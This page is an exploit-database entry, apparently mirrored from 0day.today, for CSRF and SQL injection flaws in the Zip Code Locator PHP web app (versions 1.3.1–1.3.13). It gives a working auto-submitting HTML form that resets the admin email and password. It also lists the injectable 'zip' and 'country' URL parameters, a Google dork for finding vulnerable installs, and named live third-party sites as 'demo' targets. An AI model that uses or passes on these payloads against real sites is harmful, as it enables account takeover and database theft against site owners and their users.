Lucene search
K

Zip Code Locator - CSRF/SQLi Vulnerabilities

🗓️ 20 Oct 2012 00:00:00Reported by DaOneType 
zdt
 zdt
🔗 0day.today👁 19 Views

Zip Code Locator CSRF and SQL Injection Vulnerabilities on Lookup Runner web application version 1.3.1-1.3.1

Code
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm DaOne member from Inj3ct0r Team                    1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
##########################################
# Exploit Title: Zip Code Locator - CSRF/SQLi Vulnerabilities
# Date: 2012-10-19
# Author: DaOne aka Mocking Bird
# Home: 1337day Inj3ct0r Exploit Database 
# Software Link: http://www.lookuprunner.com
# Category: webapps/php
# Version: 1.3.1-> 1.3.13 
# Price: $149
# Google dork: O_o intext:"Zip Code Locator by Lookup Runner"
##########################################
[#] [CSRF Change Admin Password]:
<html>
<body onload="document.form.submit();">
<form action="http://[target]/index.php" method="post" name="form">
<input type="hidden" name="email" value="[email protected]">
<input type="hidden" name="new_password" value="passw0rd">
<input type="hidden" name="new_password2" value="passw0rd">
<input type="hidden" name="panel" value="admin/profile">
<input type="hidden" name="action" value="update">
</form>
</body>
</html>

[#] [SQL Injection]:
http://[host]/index.php?zip=[Error Based Injection]
http://[host]/index.php?zip=60070&country=[Error Based Injection]
# Demo:
http://www.lookuprunner.com/demo/?zip=60070&within=25&country=1
http://www.galaxyfireworks.com/zip/?zip=60070&within=25&country=1
http://www.fixingyou.net/search/?zip=1
#
Thanks to: TheGreaTTeAm/LCA and Inj3ct0r Team.

#  0day.today [2018-01-02]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

20 Oct 2012 00:00Current
7.2High risk
Vulners AI Score7.2
19